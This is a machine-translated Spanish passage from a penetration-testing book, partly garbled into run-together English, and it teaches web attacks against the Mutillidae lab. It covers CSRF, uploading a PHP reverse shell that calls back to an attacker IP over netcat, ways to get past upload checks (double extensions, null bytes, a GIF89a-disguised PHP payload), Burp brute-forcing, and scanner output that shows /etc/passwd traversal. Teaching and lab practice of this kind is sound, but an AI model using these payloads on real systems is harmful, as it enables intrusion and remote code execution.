CSRFCopyHTML El escenario de la víctima Ahora es el momento de que Angel reciba el correo electrónico de phishing y haga clic en el enlace. Una vez que lo haga, irá al servidor web alojado de Kali y hará clic en el botón Enviar solicitud. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.32 CSRFPoCVíctima Tenga en cuenta que Angela tiene la página de blog de Mutillidae ya abierta en la primera pestaña. Una vez que haga clic en el botón, será redirigida a la página del blog con una nueva entrada de blog sorpresa, que se muestra en la Figura 8.33. Figura 8.33 CSRFPoCResultados Carga de archivos Las vulnerabilidades de carga de archivos se aprovechan al poder cargar archivos maliciosos en el servidor web de destino. En la práctica, el objetivo es poder cargar un shell web que pueda ejecutarse en el servidor web de la víctima. Los servidores web admiten más de un lenguaje de programación. SimpleFileUpload En este ejemplo, utilizaremos Mutillidae para cargar un shell web de PHP, con el nivel de seguridad establecido en cero (sin controles de seguridad). En otras palabras, deberíamos poder cargar cualquier tipo de archivos en el servidor web. Para comenzar, navegue hasta la página de carga de archivos en la aplicación web de Mutillidae, que se muestra en la Figura 8.34: http://[Dirección IP]/mutillidae/index.php?page=upload-file.php Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.34 MutillidaeFileUpload En el host del atacante, copie el shell web de PHP que viene preinstalado en Kali: root@kali:~#cp/usr/share/laudanum/php/php-reverse-shell.php/root/Documentos A continuación, edite el archivo y asegúrese de incluir la dirección IP de cuatro hosts Kali y el número de puerto en el que queremos escuchar: $ip='172.16.0.102';//CAMBIA ESTO $puerto=2222;// CAMBIA ESTO Después de guardar el archivo, inicie un oyente usando netcat : root@kali:~/Documentos#nc-nlvp2222 escuchando[cualquiera]2222… En esta etapa, estamos listos para infectar el servidor de destino. Vuelva a la página de carga del archivo Mutillidae e intente cargar el archivo webshell. ¡Genial! A continuación, cambie la URL y apunte al nuevo archivo PHP: http://[Dirección IP]/mutillidae/index.php?page=/tmp/php-reverse shell.php Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.35 Mutillidae–FileUploadResults Una vez que lleguemos a la URL maliciosa, regrese a la ventana del terminal y verá tenemos un caparazón remoto: root@kali:~/Documentos#nc-nlvp2222 escuchando[cualquiera]2222… conectarse a [172.16.0.102] desde (DESCONOCIDO) [172.16.0.107] 57374 Linuxubuntu5.4.0-40-generic#44-UbuntuSMPTueJun2300:01:04UTC2020x86_64x86_64x86_64GNU/ Linux 09:48:20up6days,18:30,1user,loadaverage:0.00,0.00,0.00 TTY USERFROM03Jul20?xdm? INICIAR SESIÓN @ IDLEJCPUPPCPUWHAT :0 :0 48:230.00sgus/usr/lib/gdm3/gdm-x-session--runscriptenvGNOME_SHELL_SESSION_MODE=ubuntu/usr/bin/gnomesession--systemd-sesión=ubuntu uid = 33 (www-datos) gid = 33 (www-datos) grupos = 33 (www-datos) /bin/sh:0: no se puede acceder a tty; control de trabajo desactivado $ por persona / PS OmitiendoValidación Canal de Telegram : @IRFaraExam Machine Translated by Google Inthepreviousexample, wehadzeroprotection, andthePHPreverseshellwas uploadedsuccessfully.Therearemultiplewaystohardenthefileupload, y therearemultipleotherstobypassthisprotection.Inthisexample, youwillsee howtohackaroundthefileextensionprotection.Inthiscase, thedeveloperwill beblockingunwantedextensionstobeuploaded.Forexample, onlyimagesare allowedtobeuploaded.Ifthat'sthecase, allweneedistointercepttherequest inBurpSuite (ver Figure8.36) andmaketheappropriatechanges.Wewilluse thesameuploadpageinMutillidae, butthistime, image.Atthisstage wewilluploadanormal , no queremos que la validación de JavaScript impida cargar nuestro shell. Figura 8.36 Carga de archivo de datos POST A continuación, realizaremos los siguientes cambios en la solicitud web anterior, como se muestra en la Figura 8.37: 1. Cambie el nombre del archivo de photo.png a photo.php.png . 2.Asegúrese de que el tipo de contenido permanezca como image/png . 3. Cambiar el contenido de la imagen a nuestra carga simple de PHP. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.37 FileUploadPostDataPayloads FileRename Las aplicaciones verifican el valor de la extensión del archivo para impedir que las personas carguen algo como archivos shell.php . En el ejemplo anterior, dejamos el de validación. final e insertamos el .php antes para que la extensión del método Un servidor web Apache permitirá que se ejecute una extensión doble (por ejemplo, shell.php.png ). En IIS6 (y también en las versiones anteriores), puede agregar este punto y coma antes de la extensión final (por ejemplo, shell.asp;.png ). Puede eludir las reglas que distinguen entre mayúsculas y minúsculas mediante la manipulación de las mayúsculas y minúsculas del carácter de extensión. Estos son algunos ejemplos: Shell.pHP Shell.php3 Shell.ASP Otro truco es agregar bytes nulos (00 en hexadecimal) antes de la extensión final. Por ejemplo, use shell.php%00.png . Canal de Telegram : @IRFaraExam Machine Translated by Google PROPINA Para realizar cambios hexadecimales en sus solicitudes web, puede usar la subpestaña Hexadecimal en la ventana Intercepción en Burp Suite (consulte la Figura 8.38). Figura 8.38 BurpSuite –InterceptHexTab Tipo de contenido El tipo de contenido es otro factor importante al cargar un archivo en un servidor remoto. El desarrollador probablemente podría haber agregado una validación en el front-end/back-end para verificar el tipo de contenido del archivo. Siempre asegúrese de que el tipo de contenido coincida con el tipo de archivo que el servidor espera. Contenido de la carga útil Mire de cerca el comienzo de la carga útil que usamos en nuestro ejemplo (vea la Figura 8.37), que se muestra aquí: GIF89a; <?phpsystem('ls-la');?> Probablemente se esté preguntando: “¿Qué es el GIF89a; ¿para?” Esta es una firma de encabezado que engañará al servidor para que piense que nuestro archivo es una imagen legítima. Pruebe nuestra idea, guarde la carga útil en un archivo de texto, asígnele el nombre payload.txt y verifique su tipo usando el comando de archivo : root@ubuntu:~#filepayload.txtpayload.txt:GIFimagedata,version89a,2619x16188 Codificación En algunas situaciones, encontrará algunos sitios web que tienen algunas protecciones básicas en el backend que bloquearán los caracteres no deseados (para cargas, XSS, inyección de comandos, etc.). Si ese es el caso, intente usar codificación. Canal de Telegram : @IRFaraExam Machine Translated by Google es una forma, luego use la codificación HTML. Para que esto suceda, nuestro amigo Burp Suite viene a otro rescate porque hay una pestaña Decodificador dedicada para este propósito, como se muestra en la Figura 8.39. Figura 8.39 Codificación de BurpSuite OWASPTop10 Hasta ahora, ha visto las vulnerabilidades web más comunes. OpenWeb Application Security Project (OWASP) es una organización sin fines de lucro que se dedica a ayudar a empresas e individuos en los desafíos de seguridad de las aplicaciones. Visite owasp.org. El OWASP ha categorizado las 10 vulnerabilidades web más críticas e importantes y las ha denominado OWASP Top 10. Consulte owasp.org/www project-top-ten/. Tenga en cuenta que esta lista siempre está cambiando, y la organización OWASP está trabajando de cerca con la comunidad para mantenerla actualizada: 1. Inyección. Esto incluye todo tipo de inyecciones. SQLi comandoinyección LDAPinyección inyección HTML Carroretornolíneaalimentacióninyección Y mucho más 2. Autenticación y gestión de sesiones inválidas. En esta categoría, el lo más probable es que el atacante utilice lo siguiente: Omisión de autenticación Canal de Telegram : @IRFaraExam Machine Translated by Google Escalada de privilegios 3. Exposición de datos confidenciales. datos/recursos. 4.Entidades externas XML (XXE). Esta debilidad se aprovecha cuando la aplicación utiliza XML para evaluar las referencias externas. 5. Control de acceso roto. Estas fallas se explotan atacando el debilidad de autorización de un sitio web. 6. Configuración incorrecta de la seguridad. Una configuración incorrecta del sitio web, como dejar el nombre de usuario y la contraseña predeterminados, permitirá que el atacante la aproveche. 7. Crossÿsite scripting. Existen tres tipos principales de XSS. reflejado almacenado DOM (se aprovecha mediante la manipulación del código JavaScript en la página web) 8.Serialización no segura.Esta falla se aprovecha cuando el sitio web implementa deficientemente esta serialización/deserialización dentro de una página web. 9. Uso de componentes con vulnerabilidades conocidas. Esta falla cubre el front-end (p. ej., jQuery) y las bibliotecas de back-end (p. ej., PHPloglibraries). 10.Registroysupervisióninsuficientes. Resumen En este capítulo, aprendió sobre las vulnerabilidades más populares de las aplicaciones web. Puede profundizar en este tema utilizando otros libros dedicados a la seguridad de las aplicaciones. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 9 Pruebas de penetración web y software seguro Ciclo de vida de desarrollo Este tema merece un capítulo por sí mismo debido a su importancia. Hoy en día, la mayoría de las empresas tienen un sitio web o un portal de aplicaciones web que genera ganancias. En este capítulo, aprenderá principalmente sobre la metodología de las pruebas de penetración de aplicaciones web y cómo usar BurpSuite Proedition. En el capítulo anterior, aprendió sobre las vulnerabilidades web más comunes que encontrará en sus compromisos. Lo animo a profundizar en el tema explorando otras referencias (libros de seguridad de aplicaciones, cursos en línea y el sitio web de OWASP) para comprender el resto de las fallas (por ejemplo, falsificación de solicitud del lado del servidor, redirección abierta y mucho más). Este capitulo cubre los siguientes topicos: WebpetestingusandoBurpSuitePro Herramientas de enumeración de aplicaciones web Webaplicaciónmanualpentestchecklist Ciclo de vida de desarrollo de software seguro WebEnumerationandExploitation Burp Suite es una excelente herramienta para tener en su repertorio. Le permite encontrar toneladas de vulnerabilidades de aplicaciones web, y si quiere ser un probador de penetración web/cazador de recompensas de errores, entonces esta herramienta es imprescindible. Esta sección cubre la edición profesional de Burp Suite, que no es gratuita. BurpSuite Pro Para resumir esta herramienta en una sola frase, Burp Suite le permite usar el proxy para interceptar y modificar las solicitudes y respuestas web. Esta herramienta puede analizar vulnerabilidades basadas en aplicaciones web y mucho más (no es solo una herramienta; está fuera). Canal de Telegram : @IRFaraExam Machine Translated by Google NOTA La empresa que creó Burp Suite se llama Port Swigger. Burp Suite viene en tres sabores: Community edition, que está preinstalada en Kali Edición profesional, que admite todas las funciones de prueba manual web y cuesta $ 399 USD por año Edición Enterprise, un escáner automatizado que puede integrarse en la tubería de CI/CD (DevOps) y cuesta $ 3,999 USD por año WebPentestUsandoBurpSuite No hay nada mejor que un ejemplo práctico de prueba de penetración para mostrarle todas las funcionalidades dentro de BurpSuite Pro. En este ejemplo, aprenderá lo siguiente: CómoejecutarBurpSuitePro entenderelproxy Cómousarlapestañaobjetivo entenderelrepetidor Cómo usar el intruso UtilizetheExtenderappstore Carga de BurpSuite Pro Para este ejemplo, usaremos la aplicación web Mutillidae y la escanearemos con Burp. Para iniciar esta herramienta, descargue el archivo JAR para la edición Pro desde su cuenta en portswigger.net/. Para ejecutar la herramienta, use el siguiente comando: $java–jar[nombrearchivoburpsuite.jar] Una vez que haya iniciado Burpha, encontrará dos ventanas que le permitirán hacer lo siguiente: Guardeelproyectoendiscoantesdecomenzar Crearunproyectotemporalsinguardarendisco Canal de Telegram : @IRFaraExam Machine Translated by Google Abrirunproyectoguardadoexistente Cargue un archivo de configuración personalizado guardado de BurpSuite Antes de cambiar a un navegador, haga clic en la pestaña Proxy y haga clic en el botón Intercept Is On para desactivar el interceptor. Tenga en cuenta que Burp seguirá escuchando las solicitudes/respuestas web en el backend. En su navegador web, asegúrese de cambiar los siguientes elementos: 1. Cambie la configuración del navegador y establezca el proxy en el puerto 8080 (explicamos cómo hacerlo en el Capítulo 6, “Fase de enumeración avanzada”). 2. Asegúrese de que el navegador contenga el certificado HTTPS de BurpSuite. Debe confiar en este certificado para interceptar la comunicación HTTPS. Figura 9.1 Certificado de BurpSuite Una vez que haya descargado el certificado, abra su navegador y seleccione PreferenciasÿPrivacidad y seguridadÿCertificadosÿVer certificadosÿImportar. Cuando haga clic en Importar, le pedirá que elija el archivo de certificado (que se encuentra en su carpeta de Descargas). A continuación, asegúrese de seleccionar las dos casillas de verificación (consulte la Figura 9.2) para confiar en el certificado de CA cargado; Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.2 Importación del certificado de BurpSuite Burp Proxy Cuando inicie Burp Suite, tenga en cuenta lo siguiente: El botón de intercepción está seleccionado de forma predeterminada, por lo que deberá desactivarlo a menos que desee detener todas las solicitudes/respuestas al servidor web. En la sección Opciones (consulte la Figura 9.3), normalmente cambiará tres configuraciones. Cambio del número de puerto de escucha (de forma predeterminada, es 8080) Interceptar las solicitudes web (está habilitado de manera predeterminada) Interceptar las respuestas web que regresan del servidor (de manera predeterminada, está deshabilitado) Figura 9.3 Ficha Proxy de BurpSuite , sección Opciones Pestaña Destino Ahora es el momento de comenzar a explorar todas las páginas web en la aplicación Mutillidae mientras el botón de intercepción está desactivado. Una vez que termine, haga clic en la pestaña Destino para visualizar el nombre de dominio que está intentando probar. En la subpestaña Mapa del sitio, puede ver que Burp Suite ha detectado la estructura de Mutillidae (consulte la Figura 9.4). Enestasecciónpuedesvisualizarestesitio Canal de Telegram : @IRFaraExam Machine Translated by Google elementos: páginas HTML, imágenes, carpetas, JavaScript, etc. A continuación, en el lado izquierdo, puede seleccionar las entradas del historial para leer los detalles de la solicitud/respuesta debajo (en las ventanas donde ve las pestañas Solicitud y Respuesta). Figura 9.4 Objetivo de BurpSuite En esta etapa, configure Burp Suite para incluir Mutillidae en el alcance; en otras palabras, no desea que TIT escanee los otros dominios detectados previamente . y luego haga clic en el elemento de menú AddToScope (vea la Figura 9.5). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.5 BurpSuiteAddToScopeOption A continuación, haga clic en el botón de filtro (donde está el texto "Filtro: Ocultar elementos no encontrados...") y seleccione la casilla de verificación Mostrar solo elementos dentro del alcance (consulte la Figura 9.6). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.6 BurpSuiteIn ÿScopeFilter Para ocultar esta pantalla, simplemente haga clic en cualquier lugar fuera de ella y verá que todos los elementos fuera del alcance desaparecen (consulte la Figura 9.7) de la pestaña Mapa del sitio (solo permanecerán Mutillidae). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.7 BurpSuiteIn ÿScopeFilterApplied Enumeración de los elementos del sitio (Spidering/ContentsDiscovery) Antes de comenzar esta sección, debe saber que Burp Suite necesita mucha memoria para ejecutarse, o de lo contrario terminará con errores de tiempo de ejecución en medio de su participación. En esta etapa, BurpSuite ya ha encontrado algunos elementos durante nuestra exploración manual (están atenuados). A continuación, ejecute Descubrir contenido para buscar más elementos. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.8 BurpSuiteDiscoverContentMenuItem Una vez abierta la ventana de descubrimiento de contenido, haga clic en la pestaña Configuración para agregar las configuraciones adecuadas. En esta sección, establezca la profundidad máxima de los subdirectorios en 2 para finalizar la tarea más rápido. Profundidad máxima: 5 Número de subprocesos de descubrimiento: 4 Número de hilos de araña: 4 A continuación, seleccione la ficha Control y haga clic en La sesión no se está ejecutando para ejecutar Burp Suite (consulte la Figura 9.9). Esta tarea tardará algunas horas en completarse (según la estructura del sitio web). Cuando ya no haya más tareas en cola, haga clic en el botón Sesión en ejecución para detener el rastreo y volver a la pestaña Mapa del sitio para inspeccionar los resultados. Canal de Telegram : @IRFaraExam Machine Translated by Google Escaneo automatizado de vulnerabilidades Ahora es el momento de comenzar a encontrar algunas vulnerabilidades en Mutillidae.BurpSuitePro tiene un escáner interno que puede encontrar fallas . Figura 9.9 BurpSuiteEjecuciónDiscoverContentFeature Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.10 BurpSuiteActiveScan La pestaña Repetidor Esta pestaña es útil cuando desea inyectar manualmente una carga útil antes de enviarla a un servidor web. La carga útil puede ser cualquier tipo de entrada que elija, por lo que puede intentar verificar cómo responderá el servidor web. Figura 9.11 BurpSuiteSendToRepeaterMenuItem Una vez que la solicitud esté en la pestaña Repetidor, puede manipularla de la forma que desee. En este ejemplo, cambiaremos el valor de UID a 1 en el encabezado de la cookie y observaremos la respuesta. Canal de Telegram : @IRFaraExam Machine Translated by Google indique que ha iniciado sesión como administrador (consulte la figura 9.12). Figura 9.12 Cambio del parámetro UID La pestaña del intruso LapestañaIntrusolepermitefuzzearyautomatizarlassolicitudeswebenviadasalservidorweb.Haymuchastareasquepuederealizarcone Enumeración de nombres de usuario Enumeración de cualquier tipo de UID (por ejemplo, ID de cuenta, ID de producto, ID de empleado, etc.) Rastreo manual (para encontrar páginas web, directorios, archivos, etc.) Fuzzing para encontrar fallas (por ejemplo, SQLi, XSS, LFI, etc.) Ahora que sabe lo que puede hacer con la pestaña Intruso, el próximo desafío es comprender los tipos de ataque: Francotirador: este tipo de ataque se usa con una carga útil. Hay muchos ejemplos prácticos que se pueden usar con el método de francotirador (por ejemplo, enumerar nombres de usuario, UID, buscar archivos/directorios, etc.). Ariete : este tipo de ataque le permitirá usar una carga útil. En el tipo de ariete, puede insertar la misma carga útil en varias áreas de la solicitud web (por ejemplo, insertar la misma carga útil en la URL y el encabezado de la solicitud web también). Bomba de racimo: este tipo le permitirá insertar varias bombas no relacionadas Canal de Telegram : @IRFaraExam Machine Translated by Google cargas útiles en la solicitud web (máximo 20). Un buen ejemplo es la fuerza bruta de la página de inicio de sesión; en este escenario, deberá insertar dos cargas útiles diferentes: una para el nombre de usuario y otra para la contraseña. Pitchfork: Este le permitirá insertar varias cargas útiles relacionadas en la solicitud web (rara vez he usado este tipo de ataque). Un ejemplo práctico es confundir el nombre del empleado y su interfaz de usuario asociada en otro campo. Veamos, juntos, un ejemplo práctico para aplicar fuerza bruta a la página de inicio de sesión de Mutillidae mediante la pestaña Intruso de BurpSuite . menú. En la pestaña Intruso, asegúrese de que la sub pestaña Posiciones esté seleccionada (consulte la Figura 9.13). Figura 9.13 Subpestaña BurpSuiteIntruderPositions Pordefecto, thesniperattacktypeisselected, andBurpSuitealreadyidentified theinsertionpoints.Forthisexample, bruta forcetheadminusername (estática) andloadthepasswordfromadictionaryfile (variablepayload) .Inotherwords, youwillneedonlyonepayload, whichisthepasswordvalue.Next, choosethe Sniperattacktype (keepitbecauseit'salreadyselected) andclickClearto removealltheinsertionpoints.Toselectyourpayload, resalte la password123valueandclickAddtoinsertyourvariable (ver Figure9.14). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.14 BurpSuiteIntruderPayload En esta etapa, haga clic en la pestaña Cargas útiles y mantenga el tipo de carga útil como Lista simple. A continuación, haga clic en el menú desplegable Agregar de la lista y elija Contraseñas. Puede comenzar con este, pero para este ejemplo, usaremos un archivo de diccionario personalizado haciendo clic en Cargar (consulte la Figura 9.15). Una vez cargadas las contraseñas, haga clic en el botón Iniciar ataque ubicado en la esquina superior derecha. Cuando se inicie el ataque, se abrirá una nueva ventana para mostrar el progreso de las contraseñas probadas . Burp Extender Esta pestaña le permitirá agregar más herramientas y funcionalidades a Burp Suite. Para algunas de ellas, debe tener la versión Pro. Por ejemplo, uno de los módulos que puede agregar es Retire.js , que busca bibliotecas de JavaScript obsoletas. Hay una herramienta para cada ocasión: .NET, Java, JavaScript, JSON, XSS y CSRF, por nombrar algunas. Antes de utilizar BAppStore, deberá descargar la versión más reciente del archivo JAR de Jython desde www.jython.org/download.html. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.15 BurpSuiteIntruderPayloadOption Algunas aplicaciones deben tener Jython, que es una biblioteca combinada de Python y Java. Una vez que descargue el archivo JAR de Jython, diríjase a la pestaña Extensor, seleccione la subpestaña Opciones y localice la ruta donde guardó el archivo JAR (consulte la Figura 9.17; su ruta puede ser diferente ). Canal de Telegram : @IRFaraExam Machine Translated by Google Para instalar una herramienta Burp, deberá seleccionar la pestaña B App Store. En esta ventana, verá todas las aplicaciones disponibles para elegir. La pregunta más importante es cómo elegir una aplicación de la lista. Elijo la aplicación según los siguientes criterios: Dañandodecuatroestrellasoarriba Tiene una puntuación de popularidad alta Las funcionalidades de la herramienta de la aplicación ayudarán durante una prueba Su criterio podría ser diferente. Figura 9.16 BurpSuiteIntruderAttack Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.17 Pestaña BurpSuiteExtender Figura 9.18 BAppStore Canal de Telegram : @IRFaraExam Machine Translated by Google Creación de un informe en eructo Una vez que haya terminado su prueba en Burp, asegúrese de guardar su trabajo y exportar un informe de las fallas encontradas . Figura 9.19 Creación de informes en BurpSuite Una vez que haga clic en el elemento del menú, aparecerá una nueva ventana emergente. Canal de Telegram : @IRFaraExam Machine Translated by Google tendrá que seguir los pasos del asistente. Una vez que haya terminado, Burp generará un informe HTML atractivo (vea la Figura 9.20). Figura 9.20 Muestra de informe en BurpSuite Burp clasifica la gravedad de la falla en Alta, Media, Baja e Información. Lo bueno de esta herramienta es que le brinda el nivel de confianza (probabilidad de falso positivo) de cada uno. En esta etapa, su rol es probar cada vulnerabilidad y asegurarse de no informar un falso positivo. MásEnumeración Cuando se trata de una aplicación web, la fase de enumeración es un poco diferente a la de otros protocolos TCP. En esta sección, obtendrá un resumen de las herramientas que puede usar para enumerar una aplicación web. Canal de Telegram : @IRFaraExam Machine Translated by Google lograr las siguientes tareas: Rastrear (una segunda vez) los archivos en el servidor web Identifique si la versión del servidor web es antigua y tiene una vulnerabilidad crítica Detecte cualquier configuración faltante que pueda conducirlo a recursos Nmap Es una buena idea comenzar con Nmap cuando se trata de la enumeración. Podemos usar el motor de secuencias de comandos que usamos anteriormente en este libro: $nmap-sV-p80-sC[dirección IP] gateando El rastreo es un paso importante para identificar contenido oculto dentro del servidor web. Las personas a menudo implementan los archivos de configuración y los secretos necesarios en el entorno de producción. Una excelente herramienta para este propósito se llama GoBuster (puede usar esta herramienta junto con Burp Crawler para verificar dos veces si se perdió algún punto oculto): root@kali:~#gobusterdir-uhttp://172.16.0.107/mutillidae/-w/usr/share/wordlists/dirbuster/directorylist-2.3-medium.txt-e-t25 ================================================== ============= Gobusterv3.0.1 […] ================================================== ===== 2020/08/1208:04:37Comenzandogobuster ================================================== ===== http://172.16.0.107/mutillidae/documentation(Estado:301) http://172.16.0.107/mutillidae/ ajax(Estado:301) http://172.16.0.107/mutillidae/test(Estado:301) http: //172.16.0.107/ mutillidae/includes(Estado:301) http://172.16.0.107/mutillidae/javascript(Estado:301) http:// 172.16.0.107/mutillidae/classes(Estado:301) http:// 172.16.0.107/mutillidae/styles(Estado:301) http://172.16.0.107/mutillidae/webservices(Estado:301) http://172.16.0.107/mutillidae/ images(Estado:301) http://172.16. 0.107/mutillidae/contraseñas(Estado:301) http:// 172.16.0.107/mutillidae/configuration(Estado:301) http://172.16.0.107/mutillidae/ phpmyadmin(Estado:301) ================================================== ====== Canal de Telegram : @IRFaraExam Machine Translated by Google 2020/08/1208:04:51Terminado Tenga en cuenta que GoBuster no está instalado de forma predeterminada en KaliLinux. necesitará ejecutar el comando apt : $aptinstallgobuster-y Evaluación de vulnerabilidad Para encontrar vulnerabilidades en el middleware (servidor web), necesitará una escáner de vulnerabilidades . En el capítulo 7, “Fase de explotación” , aprendió cómo useOpenVASparabuscarvulnerabilidades.Enestasección,obtendrá otra herramienta rápida que puede buscar fallas en la aplicación web, y se llama Nadie: raíz @ kali: ~ # nikto-hosthttp: //172.16.0.107/mutillidae/ -Niktov2.1.6 -------------------------------------------------- ----------------- -------- + IP de destino: 172.16.0.107 + Nombre de host de destino: 172.16.0.107 +Puerto de destino: +Hora de inicio: 80 2020-08-1208:15:56(GMT-4) -------------------------------------------------- ----------------- -------+Servidor:Apache/2.4.41(Ubuntu) +CookiePHPSESSIDcreadasinlabanderahttponly +Cookieshowhintscreatedwiththehttponlyflag + El encabezado X-Frame-Options anti-clickjacking no está presente. El encabezado +X-XSS-Protection se ha configurado para deshabilitar la protección XSS. Es poco probable que haya una buena razón para esto. +Encabezado poco común 'usuario conectado' encontrado, con contenido: + El encabezado X-Content-Type-Options no está configurado. + No se encontraron directorios CGI (use '-Call' para forzar la verificación de todos los directorios posibles) +"robots.txt"contiene8entradasquedebenversemanualmente. +OSVDB-630: El servidor web puede revelar su IP interna o real en el encabezado de ubicación a través de una solicitud a/images over HTTP/1.0. El valor es "127.0.1.1". + Métodos HTTP permitidos: GET, POST, OPTIONS, HEAD + El servidor web devuelve una respuesta válida con métodos HTTP no deseados, esto puede causar falsos positivos. +DEBUGHTTPverbmayshowserververdebugginginformation.Seehttp://msdn.microsoft.com/ en-us/library/e8z01xdh%28VS.80%29.aspx Canal de Telegram : @IRFaraExam Machine Translated by Google para detalles. +/ mutillidae/index.php? page=../../../../../../../../../../etc/passwd: El complemento PHP-NukeRocket es vulnerable al cruce de archivos, lo que permite a un atacante ver cualquier archivo en el host (probablemente Rocket, pero podría ser cualquier index.php ) […] ManualWebPenetrationTestingChecklist En su inspección manual, encontrará muchas tareas repetitivas para cada página web. Algunas páginas especiales (p. ej., página de inicio de sesión, página de registro, etc.) tienen verificaciones adicionales. Dividamos esta lista de verificación en dos partes, una para los escenarios comunes y otra para los excepcionales. acceso. Lista de verificación común Aplicarás esta lista a cualquier tipo de página web (incluso las excepcionales). Comencemos: 1. Detenga cada solicitud web en su pestaña Proxy Intercept y envíela a la pestaña repetidora para su inspección. 2. Identifique los puntos de entrada al servidor back-end, como se muestra aquí: URL (buscar cadena de consulta) Encabezado de solicitud (inspeccionar la cookie, etc.) 3. Inyecte caracteres especiales en los puntos de entrada e inspeccione la respuesta web (puede usar el repetidor de Burp en un intruso para hacer el trabajo). Además, lea el mensaje de error para ver si muestra información jugosa. Para SQLi : Insertar una sola comilla Para XSS: Trytoinsertascripttag<script>alert(1)</script> 4. Manipular el comportamiento de la página web (p. ej., introducir un número negativo en el campo del carrito de la compra, etc.). 5.UseBurpTarget/Sitemapparaubicarlo: Archivos ocultos (p. ej., Robots.txt, archivos de copia de seguridad, archivos de texto/PDF, restos de depuración, portal de administración) Canal de Telegram : @IRFaraExam Machine Translated by Google Objetivos de alcance no identificados Llamadas WebAPI/SOAP Plataforma CMS (por ejemplo, WordPress) 6. Inspeccione la lógica HTML para encontrar cualquier falla de JavaScript/HTML. 7. Intente llamar a los recursos de administración mediante una cuenta con privilegios bajos. 8. Intente llamar a otros recursos de usuario (p. ej., una imagen de otro usuario). 9. Intente llamar a un recurso protegido sin autenticación. 10. Utilice la pestaña Intruso para cualquier tipo de entrada difusa (p. ej., UID). Lista de comprobación de páginas especiales En algunas páginas, deberá ejecutar pruebas adicionales a las enumeradas anteriormente. La naturaleza de estas páginas es diferente; por lo tanto, necesitamos pruebas adicionales. Cargar página Cuando encuentre una página cargada, debe probar estos elementos: Asegúrese de enviar la solicitud web a la pestaña Repetidor Burp. ¿Puede omitir la validación (consulte el capítulo anterior para obtener más información)? Cambielaextensióndelarchivo. Cambieeltipodecontenido. Cambieelcontenidobinario. Página de inicio de sesión La página de inicio de sesión, si se pasa por alto, permitirá acceder a recursos sin restricciones. Veamos cómo podemos probarlo: Pruebe las credenciales predeterminadas (por ejemplo, nombre de usuario = admin y contraseña = admin). Fuerza bruta. Use la inyección SQL para omitir la página de inicio de sesión. ¿Puede enumerar los nombres de usuario iniciando sesión con un usuario no registrado? Registro de usuario Canal de Telegram : @IRFaraExam Machine Translated by Google El registro de un usuario le permitirá iniciar sesión en el portal y explorar lo que hay dentro. Regístrese con un usuario existente y verifique el mensaje de error (esto le permitirá enumerar usuarios). Regístrese con una contraseña débil. Prueba de inyección SQL (recuerde que este formulario es para crear un nuevo registro de usuario en la base de datos). Restablecer/cambiar contraseña Aquí hay otra forma interesante que interactúa con los registros del usuario en el back-end . Verifique los siguientes elementos manualmente: Intente restablecer el usuario existente para comprender el flujo de trabajo de la contraseña Reiniciar. ¿Puedes cambiar la contraseña de otra persona? Si el sistema genera una contraseña temporal aleatoria, verifique lo siguiente: La complejidad de la contraseña. Su tiempo de vida (timeoutexpiry). ¿Está obligado el usuario a cambiarlo después del primer inicio de sesión? Ciclo de vida de desarrollo de software seguro Cada aplicación web/móvil pasa por diferentes fases antes de implementarse en el entorno de producción. Este es un tema importante en la seguridad de las aplicaciones y las pruebas de penetración al mismo tiempo. La Figura 9.21 muestra los pasos por los que pasa un proyecto típico en cada fase de un ciclo de vida de desarrollo de software (SDLC). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.21 Ciclo de vida de desarrollo de software En esta sección, obtendrá información sobre los roles y deberes del análisis de seguridad en cada fase de SDL. El propósito de este proceso es convertirlo en un ciclo de vida de desarrollo de software seguro (SSDL) . Figura 9.22 Ciclo de vida de desarrollo seguro Análisis / ArchitecturePhase Atthisstage, theprojectisstillfresh, andeveryoneislayingoutthefoundation ofthebusinesscases.Asasecurityprofessional, youwillbeattendingkick fuera de meetingstounderstandandprovidethenecessaryadvice (miembros theprojectteam) inadvancebeforedevelopingtheproduct.Thisiswhereyoustart planningforlatertestsandprepareaheadforimplementingthesecuritytoolsin laterstages.Speakingaboutplanning, itwouldbegoodtoprepareasecurity architecturedocument (por ejemplo, threatmodeling) aheadoftime (seethenextsection forhowtoprepareanapplicationthreatmodelingdocument). Modelado de amenazas de aplicaciones Canal de Telegram : @IRFaraExam Machine Translated by Google El modelado de amenazas de aplicaciones le permitirá analizar la postura de una aplicación y le ayudará a diseñar los escenarios de ataque antes de comenzar con las pruebas de seguridad más adelante en el proyecto. Un documento de modelado de amenazas de aplicaciones contendrá principalmente las siguientes secciones: Activos Puntos de entrada Terceros niveles de confianza Diagrama de flujo de datos (DFD) Antes de continuar con las próximas secciones, tendrá que hacerse las siguientes preguntas (para evaluar correctamente el proyecto): ¿La aplicación es visible para Internet o solo para la intranet? ¿La aplicación almacena datos confidenciales (p. ej., información de identificación personal, también conocida como PII)? ¿Cómo se consume la aplicación (p. ej., sólo una aplicación web?)? ¿Existen entidades de terceros (p. ej., servicios en la nube o proveedores externos)? ¿Cuenta con el diagrama de infraestructura? (Si no lo tiene, solicítelo) Activos Los activos son los elementos que los atacantes (hackers) buscan robar. El ejemplo más obvio son los datos confidenciales, como tarjetas de crédito, números de seguros, información personal del cliente, etc. (PII). Dispositivos de red Servidores de alojamiento software intermedio Nivel de aplicación (web/móvil) Puntos de entrada Canal de Telegram : @IRFaraExam Machine Translated by Google Como dice el nombre, los puntos de entrada son las vías de entrada desde las que un atacante puede interactuar con un conjunto. Recuerde que un conjunto no es solo la aplicación web, sino que también puede ser una base de datos o el propio host (o máquinas virtuales/contenedores, etc.). Terceros En esta sección, enumera los elementos de terceros con los que la aplicación interactuará. Un ejemplo común es la nube, como Microsoft Azure o Amazon Web Services (AWS), etc. niveles de confianza Después de 